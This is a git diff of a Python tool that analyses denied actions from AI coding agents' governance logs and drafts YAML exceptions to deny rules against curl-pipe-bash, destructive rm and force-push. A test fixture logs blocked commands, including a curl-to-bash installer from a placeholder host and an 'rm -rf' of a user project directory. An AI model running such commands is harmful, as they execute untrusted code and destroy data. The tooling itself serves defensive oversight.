+                notes=f"LLM-enriched (ollama {OLLAMA_MODEL}). Heuristic was: {heuristic.template}",
+            ))
+        except Exception as e:
+            out.append(RuleDraft(
+                kind="heuristic-fallback",
+                template=heuristic.template,
+                confidence=heuristic.confidence,
+                rule_yaml=heuristic.rule_yaml,
+                predicted_impact=heuristic.predicted_impact,
+                notes=f"LLM enrichment failed ({e}); fell back to heuristic.",
+            ))
+    return out

--- a/python/analysis/loaders.py
+++ b/python/analysis/loaders.py
@@ -1,0 +1,71 @@
+"""Load gov-decisions JSONL files with window filtering."""
+from __future__ import annotations
+
+import re
+from dataclasses import dataclass
+from datetime import datetime, timedelta
+from pathlib import Path
+
+from analysis.types import Decision, parse_decision_line
+
+GOV_DECISIONS_PATTERN = re.compile(r"^gov-decisions-\d{4}-\d{2}-\d{2}\.jsonl$")
+
+
+@dataclass(frozen=True)
+class Window:
+    """Half-open time window: ts >= since AND ts < until."""
+
+    since: datetime
+    until: datetime
+
+
+@dataclass(frozen=True)
+class LoadResult:
+    decisions: list[Decision]
+    files_read: int
+    parse_errors: int
+
+
+def load_gov_decisions(decisions_dir: Path, window: Window) -> LoadResult:
+    """Load all gov-decisions-*.jsonl files in dir, filter to window.
+
+    Bad lines are counted in parse_errors and skipped — never raise (I5).
+    """
+    decisions_dir = Path(decisions_dir)
+    if not decisions_dir.exists():
+        return LoadResult(decisions=[], files_read=0, parse_errors=0)
+
+    decisions: list[Decision] = []
+    parse_errors = 0
+    files_read = 0
+
+    for path in sorted(decisions_dir.iterdir()):
+        if not GOV_DECISIONS_PATTERN.match(path.name):
+            continue
+        files_read += 1
+        with path.open("r") as f:
+            for line in f:
+                d = parse_decision_line(line)
+                if d is None:
+                    if line.strip():
+                        parse_errors += 1
+                    continue
+                if window.since <= d.ts < window.until:
+                    decisions.append(d)
+
+    return LoadResult(
+        decisions=decisions,
+        files_read=files_read,
+        parse_errors=parse_errors,
+    )
+
+
+def parse_window_str(s: str, now: datetime) -> Window:
+    """Parse 'Nd' / 'Nh' / 'Nm' as a window ending at now."""
+    if s.endswith("d"):
+        return Window(since=now - timedelta(days=int(s[:-1])), until=now)
+    if s.endswith("h"):
+        return Window(since=now - timedelta(hours=int(s[:-1])), until=now)
+    if s.endswith("m"):
+        return Window(since=now - timedelta(minutes=int(s[:-1])), until=now)
+    raise ValueError(f"Unrecognized window: {s!r}. Use Nd, Nh, or Nm.")

--- a/python/analysis/loaders.py
+++ b/python/analysis/loaders.py
@@ -42,6 +42,11 @@ def load_gov_decisions(decisions_dir: Path, window: Window) -> LoadResult:
     for path in sorted(decisions_dir.iterdir()):
         if not GOV_DECISIONS_PATTERN.match(path.name):
             continue
+        if not path.is_file():
+            # A directory whose name happens to match the pattern would crash
+            # path.open() — skip non-files to keep loaders.load_gov_decisions
+            # tolerant of weird filesystem state (I5 spirit).
+            continue
         files_read += 1
         with path.open("r") as f:
             for line in f:

--- a/python/analysis/pyproject.toml
+++ b/python/analysis/pyproject.toml
@@ -1,0 +1,28 @@
+[project]
+name = "chitin-analysis"
+version = "0.1.0"
+description = "Analysis layer for chitin gov-decisions and event chains"
+requires-python = ">=3.11"
+dependencies = [
+    "pyyaml>=6.0",
+]
+
+[project.optional-dependencies]
+dev = [
+    "pytest>=7.0",
+]
+
+[build-system]
+requires = ["setuptools>=64"]
+build-backend = "setuptools.build_meta"
+
+[tool.setuptools]
+packages = [
+    "analysis",
+    "analysis.templates",
+]
+package-dir = {"analysis" = ".", "analysis.templates" = "templates"}
+
+[tool.pytest.ini_options]
+testpaths = ["tests"]
+python_files = ["test_*.py"]

--- a/python/analysis/souls.py
+++ b/python/analysis/souls.py
@@ -2,7 +2,6 @@
 from __future__ import annotations
 
 import argparse
-import json as _json
 import sys
 from datetime import datetime, timezone
 from pathlib import Path
@@ -38,10 +37,7 @@ def main(argv: list[str] | None = None) -> int:
                               "distinct_rule_ids": 0,
                               "decisions_missing_envelope_id": 0},
                generated_at=now, window_since=now, window_until=now,
-               window_size="7d")
-    body = _json.loads(json_path.read_text())
-    body["stream"] = "souls"
-    json_path.write_text(_json.dumps(body, indent=2, sort_keys=True) + "\n")
+               window_size="7d", stream="souls")
 
     md_path.write_text(
         "# Souls Analysis — " + date_str + "\n\n"

--- a/python/analysis/souls.py
+++ b/python/analysis/souls.py
@@ -35,9 +35,10 @@ def main(argv: list[str] | None = None) -> int:
     write_json(json_path, findings=[], no_template=[],
                input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
                               "files_read": 0, "parse_errors": 0,
-                              "distinct_rule_ids": 0},
+                              "distinct_rule_ids": 0,
+                              "decisions_missing_envelope_id": 0},
                generated_at=now, window_since=now, window_until=now,
-               window_days=7)
+               window_size="7d")
     body = _json.loads(json_path.read_text())
     body["stream"] = "souls"
     json_path.write_text(_json.dumps(body, indent=2, sort_keys=True) + "\n")

--- a/python/analysis/souls.py
+++ b/python/analysis/souls.py
@@ -1,0 +1,53 @@
+"""Souls stream stub. Foundation-generalization proof."""
+from __future__ import annotations
+
+import argparse
+import json as _json
+import sys
+from datetime import datetime, timezone
+from pathlib import Path
+
+from analysis.writers import write_json
+
+
+def parse_args(argv: list[str] | None = None) -> argparse.Namespace:
+    p = argparse.ArgumentParser(prog="analysis.souls")
+    p.add_argument("--out-dir", default="python/analysis/out")
+    p.add_argument("--now", default=None)
+    return p.parse_args(argv)
+
+
+def main(argv: list[str] | None = None) -> int:
+    args = parse_args(argv)
+    if args.now:
+        now = datetime.fromisoformat(args.now)
+        if now.tzinfo is None:
+            now = now.replace(tzinfo=timezone.utc)
+    else:
+        now = datetime.now(tz=timezone.utc)
+
+    out_dir = Path(args.out_dir)
+    out_dir.mkdir(parents=True, exist_ok=True)
+    date_str = now.date().isoformat()
+    json_path = out_dir / f"souls-{date_str}.json"
+    md_path = out_dir / f"souls-{date_str}.md"
+
+    write_json(json_path, findings=[], no_template=[],
+               input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
+                              "files_read": 0, "parse_errors": 0,
+                              "distinct_rule_ids": 0},
+               generated_at=now, window_since=now, window_until=now,
+               window_days=7)
+    body = _json.loads(json_path.read_text())
+    body["stream"] = "souls"
+    json_path.write_text(_json.dumps(body, indent=2, sort_keys=True) + "\n")
+
+    md_path.write_text(
+        "# Souls Analysis — " + date_str + "\n\n"
+        "_Stub stream. Real detection ships in v2._\n"
+    )
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/python/analysis/templates/__init__.py
+++ b/python/analysis/templates/__init__.py
@@ -1,0 +1,1 @@
+"""Heuristic rule-draft templates registered by rule_id."""

--- a/python/analysis/templates/__init__.py
+++ b/python/analysis/templates/__init__.py
@@ -1,1 +1,19 @@
-"""Heuristic rule-draft templates registered by rule_id."""
+"""Template registry. Each entry maps a rule_id to a draft function.
+
+A template function takes a Pattern and returns a RuleDraft, or None if the
+template can't draft for this specific pattern.
+"""
+from __future__ import annotations
+
+from typing import Callable, Optional
+
+from analysis.types import Pattern, RuleDraft
+
+TemplateFunc = Callable[[Pattern], Optional[RuleDraft]]
+
+REGISTRY: dict[str, TemplateFunc] = {}
+
+
+def register(rule_id: str, fn: TemplateFunc) -> None:
+    """Register a template function for a rule_id."""
+    REGISTRY[rule_id] = fn

--- a/python/analysis/templates/all.py
+++ b/python/analysis/templates/all.py
@@ -1,0 +1,9 @@
+"""Single import to load every v1 template (triggers registration).
+
+Alphabetical for predictability. Registration order does not matter for
+correctness in v1 (no overlapping rule_ids).
+"""
+from analysis.templates import bounds_max_files_changed  # noqa: F401
+from analysis.templates import no_curl_pipe_bash         # noqa: F401
+from analysis.templates import no_destructive_rm         # noqa: F401
+from analysis.templates import no_force_push             # noqa: F401

--- a/python/analysis/templates/bounds_max_files_changed.py
+++ b/python/analysis/templates/bounds_max_files_changed.py
@@ -1,0 +1,57 @@
+"""Template for `bounds:max_files_changed`.
+
+Doc-batch detection: if deny reason mentions docs/wiki/graphify-out, propose
+a context-aware higher ceiling.
+"""
+from __future__ import annotations
+
+from typing import Optional
+
+from analysis.templates import register
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+DOC_KEYWORDS = ("docs/", "wiki/", "README", "graphify-out/")
+
+
+def _is_doc_batch(reason: str) -> bool:
+    if not reason:
+        return False
+    return any(k in reason for k in DOC_KEYWORDS)
+
+
+def draft(pattern: Pattern) -> Optional[RuleDraft]:
+    if not pattern.decisions:
+        return None
+
+    doc_count = sum(1 for d in pattern.decisions if _is_doc_batch(d.reason or ""))
+    if doc_count == 0:
+        return None
+
+    rule_yaml = (
+        "rules:\n"
+        "  - id: bounds-max-files-doc-batch\n"
+        "    when:\n"
+        "      action_type: git.push\n"
+        "      changed_paths_all_match: '^(docs/|wiki/|graphify-out/)'\n"
+        "    bounds:\n"
+        "      max_files_changed: 200\n"
+        "      max_lines_changed: 10000\n"
+        "    reason: 'doc-batch ceiling override (analysis-suggested)'\n"
+    )
+    impact = PredictedImpact(
+        samples_evaluated=pattern.count,
+        would_allow=doc_count,
+        would_still_deny=pattern.count - doc_count,
+        method="reason-mentions-doc-keyword",
+    )
+    return RuleDraft(
+        kind="heuristic",
+        template="bounds_max_files_changed",
+        confidence="medium",
+        rule_yaml=rule_yaml,
+        predicted_impact=impact,
+        notes="Doc-batch detected via reason text; tighten with changed_paths inspection in v2.",
+    )
+
+
+register("bounds:max_files_changed", draft)

--- a/python/analysis/templates/bounds_max_files_changed.py
+++ b/python/analysis/templates/bounds_max_files_changed.py
@@ -27,30 +27,37 @@ def draft(pattern: Pattern) -> Optional[RuleDraft]:
     if doc_count == 0:
         return None
 
+    # The kernel's Bounds (gov/policy.go) is GLOBAL — there is no per-rule
+    # bounds override in v1 schema. So this template suggests raising the
+    # global ceiling, which has broader effect than just doc-batches. Per-rule
+    # bounds with a path predicate would require a kernel change (Issue #70).
     rule_yaml = (
-        "rules:\n"
-        "  - id: bounds-max-files-doc-batch\n"
-        "    when:\n"
-        "      action_type: git.push\n"
-        "      changed_paths_all_match: '^(docs/|wiki/|graphify-out/)'\n"
-        "    bounds:\n"
-        "      max_files_changed: 200\n"
-        "      max_lines_changed: 10000\n"
-        "    reason: 'doc-batch ceiling override (analysis-suggested)'\n"
+        "# Replace the top-level `bounds:` block in chitin.yaml.\n"
+        "# WARNING: Bounds is global — this raises the ceiling for ALL git.push,\n"
+        "# not just doc-batches. Per-rule bounds with changed_paths predicate\n"
+        "# requires kernel work (see Issue #70).\n"
+        "bounds:\n"
+        "  max_files_changed: 200\n"
+        "  max_lines_changed: 10000\n"
     )
     impact = PredictedImpact(
         samples_evaluated=pattern.count,
         would_allow=doc_count,
         would_still_deny=pattern.count - doc_count,
-        method="reason-mentions-doc-keyword",
+        method="reason-mentions-doc-keyword (global Bounds raise — broader than doc-only)",
     )
     return RuleDraft(
         kind="heuristic",
         template="bounds_max_files_changed",
-        confidence="medium",
+        confidence="low",
         rule_yaml=rule_yaml,
         predicted_impact=impact,
-        notes="Doc-batch detected via reason text; tighten with changed_paths inspection in v2.",
+        notes=(
+            "Global Bounds raise. Doc-batch detected via reason text; "
+            "for per-path-predicate bounds, the kernel needs a Rule.Bounds "
+            "field (Issue #70). Confidence is low because the global raise "
+            "affects all git.push actions, not just doc batches."
+        ),
     )
 
 

--- a/python/analysis/templates/no_curl_pipe_bash.py
+++ b/python/analysis/templates/no_curl_pipe_bash.py
@@ -1,0 +1,65 @@
+"""Template for `no-curl-pipe-bash`.
+
+Heuristic: extract URL host from the curl command. If the host is on a
+known-trusted list, propose host-allowlist exemption.
+"""
+from __future__ import annotations
+
+import re
+from typing import Optional
+
+from analysis.templates import register
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+TRUSTED_HOSTS = frozenset({
+    "get.deno.land",
+    "sh.rustup.rs",
+    "install.python-poetry.org",
+    "raw.githubusercontent.com",
+})
+
+URL_RE = re.compile(r"https?://([^/\s|]+)")
+
+
+def extract_host(target: str) -> Optional[str]:
+    if not target:
+        return None
+    m = URL_RE.search(target)
+    return m.group(1) if m else None
+
+
+def draft(pattern: Pattern) -> Optional[RuleDraft]:
+    if not pattern.decisions:
+        return None
+
+    hosts = [extract_host(d.action_target or "") for d in pattern.decisions]
+    trusted = sum(1 for h in hosts if h and h in TRUSTED_HOSTS)
+    if trusted == 0:
+        return None
+
+    rule_yaml = (
+        "rules:\n"
+        "  - id: trusted-curl-hosts\n"
+        "    when:\n"
+        "      action_type: shell.exec\n"
+        "      action_target_regex: 'curl[^|]*https?://(get\\.deno\\.land|sh\\.rustup\\.rs|install\\.python-poetry\\.org)/'\n"
+        "    decide: allow\n"
+        "    reason: 'official installer from trusted host (analysis-suggested)'\n"
+    )
+    impact = PredictedImpact(
+        samples_evaluated=pattern.count,
+        would_allow=trusted,
+        would_still_deny=pattern.count - trusted,
+        method="host-extracted-from-url-allowlist",
+    )
+    return RuleDraft(
+        kind="heuristic",
+        template="no_curl_pipe_bash",
+        confidence="medium",
+        rule_yaml=rule_yaml,
+        predicted_impact=impact,
+        notes="Trusted-host list is conservative; extend with reviewer approval.",
+    )
+
+
+register("no-curl-pipe-bash", draft)

--- a/python/analysis/templates/no_curl_pipe_bash.py
+++ b/python/analysis/templates/no_curl_pipe_bash.py
@@ -11,11 +11,12 @@ from typing import Optional
 from analysis.templates import register
 from analysis.types import Pattern, PredictedImpact, RuleDraft
 
+# MUST stay in sync with the regex in `draft()` below. predicted_impact uses
+# this set, so any host added here must also appear in the emitted regex.
 TRUSTED_HOSTS = frozenset({
     "get.deno.land",
     "sh.rustup.rs",
     "install.python-poetry.org",
-    "raw.githubusercontent.com",
 })
 
 URL_RE = re.compile(r"https?://([^/\s|]+)")
@@ -38,13 +39,12 @@ def draft(pattern: Pattern) -> Optional[RuleDraft]:
         return None
 
     rule_yaml = (
-        "rules:\n"
-        "  - id: trusted-curl-hosts\n"
-        "    when:\n"
-        "      action_type: shell.exec\n"
-        "      action_target_regex: 'curl[^|]*https?://(get\\.deno\\.land|sh\\.rustup\\.rs|install\\.python-poetry\\.org)/'\n"
-        "    decide: allow\n"
-        "    reason: 'official installer from trusted host (analysis-suggested)'\n"
+        "# Insert ABOVE the existing no-curl-pipe-bash rule in chitin.yaml.\n"
+        "- id: trusted-curl-hosts\n"
+        "  action: shell.exec\n"
+        "  effect: allow\n"
+        "  target_regex: 'curl[^|]*https?://(get\\.deno\\.land|sh\\.rustup\\.rs|install\\.python-poetry\\.org)/'\n"
+        "  reason: 'Official installer from trusted host (analysis-suggested)'\n"
     )
     impact = PredictedImpact(
         samples_evaluated=pattern.count,

--- a/python/analysis/templates/no_destructive_rm.py
+++ b/python/analysis/templates/no_destructive_rm.py
@@ -31,14 +31,17 @@ def draft(pattern: Pattern) -> Optional[RuleDraft]:
     if safe_count == 0:
         return None
 
+    # chitin policy schema (gov/policy.go Rule): id/action/effect/target_regex/reason.
+    # Allow exception MUST be ordered BEFORE the existing no-destructive-rm deny
+    # in chitin.yaml — first-match-wins evaluation.
     rule_yaml = (
-        "rules:\n"
-        "  - id: no-destructive-rm-safe-dirs\n"
-        "    when:\n"
-        "      action_type: shell.exec\n"
-        "      action_target_regex: '\\brm\\s+-rf?\\s+(?:[^/\\s]*?/)?(?:tmp|test|out|graphify-out|build|dist|node_modules)(?:/|$)'\n"
-        "    decide: allow\n"
-        "    reason: 'cleanup of known-temp dirs (analysis-suggested)'\n"
+        "# Insert ABOVE the existing no-destructive-rm rule in chitin.yaml.\n"
+        "# Rules are evaluated top-to-bottom; first match wins.\n"
+        "- id: no-destructive-rm-safe-dirs\n"
+        "  action: shell.exec\n"
+        "  effect: allow\n"
+        "  target_regex: '\\brm\\s+-rf?\\s+(?:[^/\\s]*?/)?(?:tmp|test|out|graphify-out|build|dist|node_modules)(?:/|$)'\n"
+        "  reason: 'Cleanup of known-temp dirs (analysis-suggested)'\n"
     )
     impact = PredictedImpact(
         samples_evaluated=pattern.count,

--- a/python/analysis/templates/no_destructive_rm.py
+++ b/python/analysis/templates/no_destructive_rm.py
@@ -1,0 +1,59 @@
+"""Template for the `no-destructive-rm` rule.
+
+Proposes an exemption for known-safe directories.
+"""
+from __future__ import annotations
+
+import re
+from typing import Optional
+
+from analysis.templates import register
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+SAFE_PATTERNS = [
+    re.compile(r"\brm\s+-rf?\s+(?:[^/\s]*?/)?(?:tmp|test|out|graphify-out|build|dist|node_modules)(?:/|$)"),
+    re.compile(r"\brm\s+-rf?\s+/tmp/"),
+    re.compile(r"\brm\s+-rf?\s+\.\./?(?:tmp|test|out)/"),
+]
+
+
+def _matches_safe(target: str) -> bool:
+    if not target:
+        return False
+    return any(p.search(target) for p in SAFE_PATTERNS)
+
+
+def draft(pattern: Pattern) -> Optional[RuleDraft]:
+    if not pattern.decisions:
+        return None
+
+    safe_count = sum(1 for d in pattern.decisions if _matches_safe(d.action_target or ""))
+    if safe_count == 0:
+        return None
+
+    rule_yaml = (
+        "rules:\n"
+        "  - id: no-destructive-rm-safe-dirs\n"
+        "    when:\n"
+        "      action_type: shell.exec\n"
+        "      action_target_regex: '\\brm\\s+-rf?\\s+(?:[^/\\s]*?/)?(?:tmp|test|out|graphify-out|build|dist|node_modules)(?:/|$)'\n"
+        "    decide: allow\n"
+        "    reason: 'cleanup of known-temp dirs (analysis-suggested)'\n"
+    )
+    impact = PredictedImpact(
+        samples_evaluated=pattern.count,
+        would_allow=safe_count,
+        would_still_deny=pattern.count - safe_count,
+        method="regex-match-on-action_target",
+    )
+    return RuleDraft(
+        kind="heuristic",
+        template="no_destructive_rm",
+        confidence="medium",
+        rule_yaml=rule_yaml,
+        predicted_impact=impact,
+        notes="Proposes exemption for cleanup in /tmp, /test, out/, graphify-out/, build/, dist/, node_modules/.",
+    )
+
+
+register("no-destructive-rm", draft)

--- a/python/analysis/templates/no_force_push.py
+++ b/python/analysis/templates/no_force_push.py
@@ -1,0 +1,58 @@
+"""Template for `no-force-push`.
+
+Heuristic: keep deny on main/master, propose allow on feat/fix/spike branches.
+"""
+from __future__ import annotations
+
+from typing import Optional
+
+from analysis.templates import register
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+PROTECTED_BRANCHES = frozenset({"main", "master", "production", "release"})
+FEATURE_PREFIXES = ("feat/", "fix/", "spike/", "feature/", "bugfix/", "wip/", "draft/")
+
+
+def _is_safe_branch(target: str) -> bool:
+    if not target:
+        return False
+    branch = target.strip()
+    if branch in PROTECTED_BRANCHES:
+        return False
+    return any(branch.startswith(p) for p in FEATURE_PREFIXES)
+
+
+def draft(pattern: Pattern) -> Optional[RuleDraft]:
+    if not pattern.decisions:
+        return None
+
+    safe_count = sum(1 for d in pattern.decisions if _is_safe_branch(d.action_target or ""))
+    if safe_count == 0:
+        return None
+
+    rule_yaml = (
+        "rules:\n"
+        "  - id: no-force-push-feature-branches\n"
+        "    when:\n"
+        "      action_type: git.force-push\n"
+        "      action_target_regex: '^(feat|fix|spike|feature|bugfix|wip|draft)/'\n"
+        "    decide: allow\n"
+        "    reason: 'force-push allowed on personal/feature branches (analysis-suggested)'\n"
+    )
+    impact = PredictedImpact(
+        samples_evaluated=pattern.count,
+        would_allow=safe_count,
+        would_still_deny=pattern.count - safe_count,
+        method="branch-prefix-match",
+    )
+    return RuleDraft(
+        kind="heuristic",
+        template="no_force_push",
+        confidence="medium",
+        rule_yaml=rule_yaml,
+        predicted_impact=impact,
+        notes="Protected branches (main/master/production/release) keep the deny.",
+    )
+
+
+register("no-force-push", draft)

--- a/python/analysis/templates/no_force_push.py
+++ b/python/analysis/templates/no_force_push.py
@@ -31,13 +31,12 @@ def draft(pattern: Pattern) -> Optional[RuleDraft]:
         return None
 
     rule_yaml = (
-        "rules:\n"
-        "  - id: no-force-push-feature-branches\n"
-        "    when:\n"
-        "      action_type: git.force-push\n"
-        "      action_target_regex: '^(feat|fix|spike|feature|bugfix|wip|draft)/'\n"
-        "    decide: allow\n"
-        "    reason: 'force-push allowed on personal/feature branches (analysis-suggested)'\n"
+        "# Insert ABOVE the existing no-force-push rule in chitin.yaml.\n"
+        "- id: no-force-push-feature-branches\n"
+        "  action: git.force-push\n"
+        "  effect: allow\n"
+        "  target_regex: '^(feat|fix|spike|feature|bugfix|wip|draft)/'\n"
+        "  reason: 'Force-push allowed on personal/feature branches (analysis-suggested)'\n"
     )
     impact = PredictedImpact(
         samples_evaluated=pattern.count,

--- a/python/analysis/tests/conftest.py
+++ b/python/analysis/tests/conftest.py
@@ -1,0 +1,9 @@
+"""Shared pytest fixtures for analysis tests."""
+from pathlib import Path
+
+import pytest
+
+
+@pytest.fixture
+def fixtures_dir() -> Path:
+    return Path(__file__).parent / "fixtures"

--- a/python/analysis/tests/fixtures/gov-decisions-fixture.jsonl
+++ b/python/analysis/tests/fixtures/gov-decisions-fixture.jsonl
@@ -1,0 +1,10 @@
+{"ts":"2026-04-25T08:00:00Z","allowed":false,"mode":"enforce","rule_id":"no-destructive-rm","reason":"destructive","agent":"copilot-cli","action_type":"shell.exec","action_target":"rm -rf /tmp/cleanup","envelope_id":"env_001"}
+{"ts":"2026-04-25T08:01:00Z","allowed":false,"mode":"enforce","rule_id":"no-destructive-rm","reason":"destructive","agent":"copilot-cli","action_type":"shell.exec","action_target":"rm -rf /test/output","envelope_id":"env_002"}
+{"ts":"2026-04-25T08:02:00Z","allowed":false,"mode":"enforce","rule_id":"no-destructive-rm","reason":"destructive","agent":"copilot-cli","action_type":"shell.exec","action_target":"rm -rf /home/user/projects/important","envelope_id":"env_003"}
+{"ts":"2026-04-25T09:00:00Z","allowed":false,"mode":"enforce","rule_id":"no-destructive-rm","reason":"destructive","agent":"claude-code","action_type":"shell.exec","action_target":"rm -rf /tmp/build","envelope_id":"env_004"}
+{"ts":"2026-04-25T10:00:00Z","allowed":false,"mode":"enforce","rule_id":"no-curl-pipe-bash","reason":"curl-pipe","agent":"copilot-cli","action_type":"shell.exec","action_target":"curl https://example.com/install.sh | bash","envelope_id":"env_005"}
+{"ts":"2026-04-25T11:00:00Z","allowed":true,"mode":"enforce","rule_id":"default-allow-shell","agent":"copilot-cli","action_type":"shell.exec","action_target":"ls -la","envelope_id":"env_006"}
+{"ts":"2026-04-25T12:00:00Z","allowed":true,"mode":"enforce","rule_id":"default-allow-reads","agent":"claude-code","action_type":"file.read","action_target":"/home/user/file.txt","envelope_id":"env_007"}
+not valid json
+{"ts":"bad-timestamp","allowed":false,"rule_id":"x"}
+{"ts":"2026-04-25T13:00:00Z","allowed":false,"mode":"enforce","rule_id":"bounds:max_files_changed","reason":"42 files exceeds 25","agent":null,"action_type":"git.push","action_target":"main","envelope_id":"env_008"}

--- a/python/analysis/tests/test_cli.py
+++ b/python/analysis/tests/test_cli.py
@@ -1,0 +1,94 @@
+"""Tests for the decisions CLI entry."""
+import json
+import subprocess
+import sys
+from pathlib import Path
+
+
+def _stage_fixture(decisions_dir: Path, fixtures_dir: Path):
+    src = fixtures_dir / "gov-decisions-fixture.jsonl"
+    (decisions_dir / "gov-decisions-2026-04-25.jsonl").write_text(src.read_text())
+
+
+def test_cli_runs_end_to_end_on_fixture(tmp_path, fixtures_dir):
+    decisions_dir = tmp_path / "decisions"
+    decisions_dir.mkdir()
+    _stage_fixture(decisions_dir, fixtures_dir)
+    out_dir = tmp_path / "out"
+
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.decisions",
+         "--window", "100d",
+         "--top-n", "10",
+         "--out-dir", str(out_dir),
+         "--decisions-dir", str(decisions_dir),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 0, result.stderr
+
+    out_files = sorted(out_dir.iterdir())
+    json_files = [f for f in out_files if f.suffix == ".json"]
+    md_files = [f for f in out_files if f.suffix == ".md"]
+    assert len(json_files) == 1
+    assert len(md_files) == 1
+
+    body = json.loads(json_files[0].read_text())
+    assert body["stream"] == "decisions"
+    rule_ids = {p["rule_id"] for p in body["patterns"]}
+    assert "no-destructive-rm" in rule_ids
+
+
+def test_cli_handles_missing_decisions_dir(tmp_path):
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.decisions",
+         "--window", "7d",
+         "--out-dir", str(tmp_path / "out"),
+         "--decisions-dir", str(tmp_path / "does-not-exist"),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 2
+    assert "does not exist" in result.stderr.lower()
+
+
+def test_cli_empty_window_succeeds(tmp_path, fixtures_dir):
+    decisions_dir = tmp_path / "decisions"
+    decisions_dir.mkdir()
+    _stage_fixture(decisions_dir, fixtures_dir)
+
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.decisions",
+         "--window", "1m",
+         "--out-dir", str(tmp_path / "out"),
+         "--decisions-dir", str(decisions_dir),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 0
+    body = json.loads(list((tmp_path / "out").glob("*.json"))[0].read_text())
+    assert body["patterns"] == []
+
+
+def test_cli_deterministic_with_fixed_now(tmp_path, fixtures_dir):
+    decisions_dir = tmp_path / "decisions"
+    decisions_dir.mkdir()
+    _stage_fixture(decisions_dir, fixtures_dir)
+
+    def run(out_dir):
+        return subprocess.run(
+            [sys.executable, "-m", "analysis.decisions",
+             "--window", "100d",
+             "--out-dir", str(out_dir),
+             "--decisions-dir", str(decisions_dir),
+             "--now", "2026-04-30T12:00:00+00:00"],
+            capture_output=True, text=True, check=True,
+        )
+
+    a_dir = tmp_path / "a"
+    b_dir = tmp_path / "b"
+    run(a_dir)
+    run(b_dir)
+    a = list(a_dir.glob("*.json"))[0].read_bytes()
+    b = list(b_dir.glob("*.json"))[0].read_bytes()
+    assert a == b

--- a/python/analysis/tests/test_cli.py
+++ b/python/analysis/tests/test_cli.py
@@ -37,6 +37,11 @@ def test_cli_runs_end_to_end_on_fixture(tmp_path, fixtures_dir):
     assert body["stream"] == "decisions"
     rule_ids = {p["rule_id"] for p in body["patterns"]}
     assert "no-destructive-rm" in rule_ids
+    # New schema (post-review): window stores size + total_seconds, not days.
+    assert body["window"]["size"] == "100d"
+    assert body["window"]["total_seconds"] == 100 * 86400
+    # New summary metric: decisions missing envelope_id.
+    assert "decisions_missing_envelope_id" in body["input_summary"]
 
 
 def test_cli_handles_missing_decisions_dir(tmp_path):

--- a/python/analysis/tests/test_detect.py
+++ b/python/analysis/tests/test_detect.py
@@ -1,0 +1,122 @@
+"""Tests for pattern detection."""
+from datetime import datetime, timezone
+
+from analysis.detect import detect_patterns
+from analysis.types import Decision
+
+
+def _decision(ts="2026-04-25T08:00:00Z", allowed=False, rule_id="r1",
+              action_type="shell.exec", agent="copilot-cli", envelope_id="e1"):
+    return Decision(
+        ts=datetime.fromisoformat(ts.replace("Z", "+00:00")),
+        allowed=allowed,
+        rule_id=rule_id,
+        action_type=action_type,
+        agent=agent,
+        envelope_id=envelope_id,
+    )
+
+
+def test_empty_input_returns_empty():
+    assert detect_patterns([]) == []
+
+
+def test_single_decision_one_pattern():
+    patterns = detect_patterns([_decision()])
+    assert len(patterns) == 1
+    assert patterns[0].count == 1
+    assert patterns[0].rule_id == "r1"
+
+
+def test_all_allows_returns_empty():
+    decisions = [_decision(allowed=True, envelope_id=f"e{i}") for i in range(5)]
+    assert detect_patterns(decisions) == []
+
+
+def test_three_same_pattern():
+    decisions = [_decision(envelope_id=f"e{i}") for i in range(3)]
+    patterns = detect_patterns(decisions)
+    assert len(patterns) == 1
+    assert patterns[0].count == 3
+
+
+def test_count_descending_ranking():
+    decisions = [
+        _decision(rule_id="rule_a", envelope_id="e1"),
+        _decision(rule_id="rule_a", envelope_id="e2"),
+        _decision(rule_id="rule_a", envelope_id="e3"),
+        *[_decision(rule_id="rule_b", envelope_id=f"eb{i}") for i in range(5)],
+        _decision(rule_id="rule_c", envelope_id="ec1"),
+    ]
+    patterns = detect_patterns(decisions)
+    assert [p.count for p in patterns] == [5, 3, 1]
+    assert [p.rule_id for p in patterns] == ["rule_b", "rule_a", "rule_c"]
+
+
+def test_tie_breaker_alphabetic_on_rule_id():
+    decisions = [
+        _decision(rule_id="zeta", envelope_id="e1"),
+        _decision(rule_id="zeta", envelope_id="e2"),
+        _decision(rule_id="alpha", envelope_id="ea1"),
+        _decision(rule_id="alpha", envelope_id="ea2"),
+    ]
+    patterns = detect_patterns(decisions)
+    assert [p.rule_id for p in patterns] == ["alpha", "zeta"]
+
+
+def test_tie_breaker_secondary_on_action_type():
+    decisions = [
+        _decision(rule_id="r", action_type="zzz", envelope_id="e1"),
+        _decision(rule_id="r", action_type="aaa", envelope_id="e2"),
+    ]
+    patterns = detect_patterns(decisions)
+    assert [p.action_type for p in patterns] == ["aaa", "zzz"]
+
+
+def test_tie_breaker_tertiary_on_agent():
+    decisions = [
+        _decision(rule_id="r", action_type="t", agent="zzz", envelope_id="e1"),
+        _decision(rule_id="r", action_type="t", agent="aaa", envelope_id="e2"),
+    ]
+    patterns = detect_patterns(decisions)
+    assert [p.agent_id for p in patterns] == ["aaa", "zzz"]
+
+
+def test_null_rule_id_bucketed_as_none():
+    decisions = [_decision(rule_id=None, envelope_id="e1")]
+    patterns = detect_patterns(decisions)
+    assert patterns[0].rule_id == "<none>"
+
+
+def test_null_agent_bucketed_as_unknown():
+    decisions = [_decision(agent=None, envelope_id="e1")]
+    patterns = detect_patterns(decisions)
+    assert patterns[0].agent_id == "<unknown>"
+
+
+def test_first_last_seen_correct():
+    decisions = [
+        _decision(ts="2026-04-25T12:00:00Z", envelope_id="e1"),
+        _decision(ts="2026-04-25T08:00:00Z", envelope_id="e2"),
+        _decision(ts="2026-04-25T15:00:00Z", envelope_id="e3"),
+    ]
+    patterns = detect_patterns(decisions)
